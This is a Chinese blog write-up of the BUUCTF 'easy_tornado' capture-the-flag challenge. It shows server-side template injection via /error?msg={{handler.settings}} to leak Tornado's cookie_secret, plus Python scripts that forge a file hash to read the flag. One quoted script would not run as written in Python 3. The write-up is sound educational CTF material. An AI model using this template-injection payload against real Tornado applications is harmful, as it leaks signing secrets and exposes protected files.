BUUCTF easy_tornado WP

最新推荐文章于 2024-07-22 21:27:10 发布
最新推荐文章于 2024-07-22 21:27:10 发布
阅读量502 收藏 1
点赞数
分类专栏: ctf SQL注入 文章标签: 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45552960/article/details/103615357
版权

首先看到题目
在这里插入图片描述
分别点开
/flag.txt
/welcome.txt
/hints.txt
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
发现flag在/fllllllllllllag文件里

render是python中的一个渲染函数,渲染变量到模板中,即可以通过传递不同的参数形成不同的页面。

filehash=md5(cookie_secret+md5(filename))
现在filename=/fllllllllllllag,只需要知道cookie_secret的既能访问flag。

吧/fllllllllllllag输入到url中,结果出现了
在这里插入图片描述
看了大哥们的wp,发现是模块注入
服务端模块注入攻击(SSTI)
然后根据大佬的思路,继续往下,尝试/error?msg={{datetime}}
在Tornado的前端页面模板中,datetime是指向python中datetime这个模块,Tornado提供了一些对象别名来快速访问对象,可以参考Tornado官方文档
在这里插入图片描述
通过查阅文档发现cookie_secret在Application对象settings属性中,还发现self.application.settings有一个别名

RequestHandler.settings
An alias for self.application.settings.

handler指向的处理当前这个页面的RequestHandler对象,
RequestHandler.settings指向self.application.settings,
因此handler.settings指向RequestHandler.application.settings。

构造payload获取cookie_secret

/error?msg={{handler.settings}}

在这里插入图片描述
这是其中一个大佬的exp

import hashlib
 
def md5value(s):
    md5 = hashlib.md5() 
    md5.update(s) 
    return md5.hexdigest()
 
def jiami(): 
    filename = '/fllllllllllllag'
    cookie_s ="9cb407f6-56a4-47b5-a0dc-e7222f37b2bd"
    print(md5value(filename.encode('utf-8')))
    x=md5value(filename.encode('utf-8'))
    y=cookie_s+x
    print(md5value(y.encode('utf-8')))
 
 
jiami()

import hashlib

def md5(s):
 md5 = hashlib.md5() 
 md5.update(s) 
 return md5.hexdigest()
 
def filehash():
 filename = '/fllllllllllllag'
 cookie_secret = '9cb407f6-56a4-47b5-a0dc-e7222f37b2bd'
 print(md5(cookie_secret+md5(filename)))
 
if __name__ == '__main__':
 filehash()

得到的filehash为
在这里插入图片描述
得到flag
在这里插入图片描述

小 白 渣
关注
专栏目录
【网络安全 | CTF】护网杯2018easy_tornado解题详析(Tornado之SSTI注入)
等风来
08-24 3944
提示:filename先被md5加密后,结合cookie_secret,再次被md5加密姿势进入页面给出三个链接:提示:filename先被md5加密后,结合cookie_secret,再次被md5加密先加密filename:得到:3bf9f6cf685a6dd8defadabfb41先加密filename:可知存在模板注入,而Tornado框架的附属文件handler.settings中存在cookie_secret故get传参:/error?msg={{handler.settings}}得到
【网络安全 | CTF】攻防世界护网杯 2018 easy_tornado
等风来
07-23 3723
tornado render是python中的一个渲染函数,也就是一种模板,通过调用的参数不同,生成不同的网页,如果用户对render内容可控,不仅可以注入XSS代码,而且还可以通过{{}}进行传递变量和执行简单的表达式。或一个目录是“/Users/python/tornado-file-read/static_private/”,传入某文件的路径为“/Users/python/tornado-file-read/static/”将得到的cookie_secret同加密的内容一同进行加密。
BUUCTF-easy_tornado
wuerror的博客
07-07 3655
这题是2018护网杯原题的复现。 进去之后显示三个txt,每个点进去看看。内容如下: /flag.txt flag in /fllllllllllllag /welcome.txt render /hints.txt md5(cookie_secret+md5(filename)) 看看url,发现web9.buuoj.cn/file?filename=/flag.txt&fil...
buuctf-easy_tornado
xixihahawuwu的博客
11-23 166
打开题目环境 进去之后有三个文件,依次打开 直接告诉我们flag的位置 Render是python中的一个渲染函数,渲染变量到不同模块中,就可以通过传递不同参数 形成不同的界面 filehash=md5(cookie_secret+md5(filename)) 现在filename=/fllllllllllllag,只需要知道cookie_secret的既能访问flag。 当我尝试着直接修改payload时,弹出来一个错误界面,仔细看url,出现了新的参数 这里不知道是什么东西,去查了下,这里可能存在.
一文掌握CTF中Python全部考点
最新发布
黑战士的博客
07-22 1157
pyc文件是py文件编译后生成的字节码文件(byte code),pyc文件经过python解释器最终会生成机器码运行。因此pyc文件是可以跨平台部署的,类似Java的.class文件,一般py文件改变后,都会重新生成pyc文件。
buuctf easy-tornado
ANYOUZHEN的博客
05-26 497
打开后,flag.txt直接说明了,最终的flag在/fllllllllllllag文件下 hints.txt下提示是filehash,要是md5(cookie_secret+md5(filename))才可以结合/fllllllllllllag找到flag 发现他们的url都是由filename和filehash组成。filehash是他们filename的md5值。 当filename或filehash不匹配时,将会跳转到http://web9.buuoj.cn/error?msg=Error ..
BUUCTF [护网杯 2018] easy_tornado1
m0_74167420的博客
06-18 331
Handler指向的处理当前这个页面的RequestHandler对象,handler是RequestHandler的别名,而上面又提到RequestHandler.settings是self.application.settings的别名。2、render是python中的一个渲染函数,也就是一种模板,通过调用的参数不同,生成不同的网页,如果用户对render内容可控,即可进行SSTI模板注入或者XSS注入。(4)访问出错后出现如下界面,输入{{1}},测试得出存在SSTI模板注入漏洞。
BUUCTF---web---[护网杯 2018]easy_tornado1
2201_75556700的博客
03-13 439
3.通过第一个信息可知,flag在文件名为/fllllllllllllag这个里面,第二个信息中的render是渲染函数,第三个个信息中是一个md5加解密,因为filename我们已经知道,所以我们需要找到cookie_secret的值。8.在这三个信息中我们唯一不知道的就是cookie_secert的值,tornado中msg该传什么值才能得到cookie_secert的值,是我们接下来要做的事情,查阅文档之后。6.需要利用msg的值进行传参,在tornado官方文档中提到。2.依次点开文件链接。
BUUCTF WP
Panacea
04-25 1311
MISC 最简单 首先使用winrar修复伪加密 查看文件尾,发现是png结尾 png知识参考https://www.cnblogs.com/senior-engineer/p/9548347.html 更改文件尾得到图片后使用16进制转字符串得到flag 十六进制转字符串网站:https://www.sojson.com/hexadecimal.htm Misc-A_Beautiful_Pi...
buuojweb刷题wp详解及知识整理—-【护网杯】easy_tornado(模板注入+md5)
01-20
自己走过的路加wp辅助 信息收集加思路推理 点击一下/welcome.txt 回显 render 而且url处有异常 同理测试其他选项 通过猜测可知filehash的值就是/hint.txt中的算法得到的 从而 我们只要得到cookie_secret的值即可通过...
install_tornado2_2.rar_tornado_tornado2.2_tornado安装_vxworks_vxwo
09-23
Tornado 框架简介】 Tornado 是一个开源的 Python Web 服务器和网络库,最初由 FriendFeed 团队开发,后来被 Facebook 收购并贡献给了社区。Tornado 以其非阻塞 I/O 和异步处理能力而闻名,这使得它在处理大量...
BUUCTF---easy-tornado
weixin_44255856的博客
07-29 1694
打开链接发现存在3个txt文件 依次访问 flag.txt直接说明了,最终的flag在/fllllllllllllag文件下 hints.txt下提示是filehash,要是md5(cookie_secret+md5(filename))才可以结合/fllllllllllllag找到flag. 但是cookie_secret不知道 提示render. 谷歌发现render是python的一...
BUUCTF[护网杯 2018]easy_tornado1-write up
m0_62851980的博客
04-23 959
知识点: SSTI(模板注入),render函数,Tornado框架(知识点在最后) 打开靶机,看到三个链接: 分别点进去: 注意每个链接的url: /file?filename=/xxx&filehash=32位MD5 根据flag.txt和hint.txt提示url的形式为:文件名+32位MD5 再看hint.txt的提示:md5(cookie_secret+md5(filename))。明显我们要先找到cookie_secret进行MD5加密,再和进行MD5加密后输入的文
[BUUCTF] easy_tornado (writeup)
weixin_63306244的博客
06-10 273
tornado render是python中的一个渲染函数,也就是一种模板,通过调用的参数不同,生成不同的网页,如果用户对render内容可控,不仅可以注入XSS代码,而且还可以通过{{}}进行传递变量和执行简单的表达式。根据 flag.txt 和 hints.txt 的提示我们得出flag在/fllllllllllllag里面。回显了orz,回想welcome.txt 有提示render。有了cookie_secret后根据hints.txt。进入靶机后发现了三个文件,分别是。由此得到payload为。
BUUCTF web easy_tornado
H4ppyD0g的博客
09-19 765
网站存在以下三个目录 /flag.txt flag in /fllllllllllllag /welcome.txt render 知识点1: render是python中的一个渲染函数,渲染变量到模板中,即可以通过传递不同的参数形成不同的页面。 /hints.txt md5(cookie_secret+md5(filename)) 随便点进去一个,发现url变为?filename=/hin...
BUUCTF__[护网杯 2018]easy_tornado_题解
风过江南乱的博客
05-08 826
1
Buuctf-web:easy_tornado
羽的博客
07-01 163
就一个一个打开看看就好了 再看看这个URL,你很难没点什么想法! 做题就是要大胆的尝试。 把filename写成:/fllllllllllllag这个的时候。发现一些返回 好像msg的值会被回显。 又根据前面render函数,还有题目所给的tornad,想到ssti. 在Tornado的前端页面模板中,datetime是指向python中datetime这个模块,Tornado提供了一些对象别名来快速访问对象, 成功回显。 看到一些类。 ...
BUU-Web-easy_tornado
qq_46635165的博客
09-26 189
打开解题网址,三个txt 文件: /flag.txt,提示flag在 /fllllllllllllag 里 : /flag.txt flag in /fllllllllllllag /welcome.txt,提示 rander: /welcome.txt render /hints.txt: /hints.txt md5(cookie_secret+md5(filename)) 看完三个txt文件后,一脸懵逼,翻看大佬们的wp, 原来是关于 python 模板注入; 有关python模板注入 有关 p
BUUCTF-Web】easy_tornado
RexHa的博客
09-04 559
BUUCTF-Web】easy_tornado
[护网杯 2018]easy_tornado
03-16
护网杯 2018 中的 easy_tornado 题目是一道Web安全题目。根据题目描述,该网站使用了 Tornado 框架搭建,并且存在一个可以进行任意代码执行的漏洞。需要我们利用这个漏洞,在服务器上执行指定的命令。 解决这道题目...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值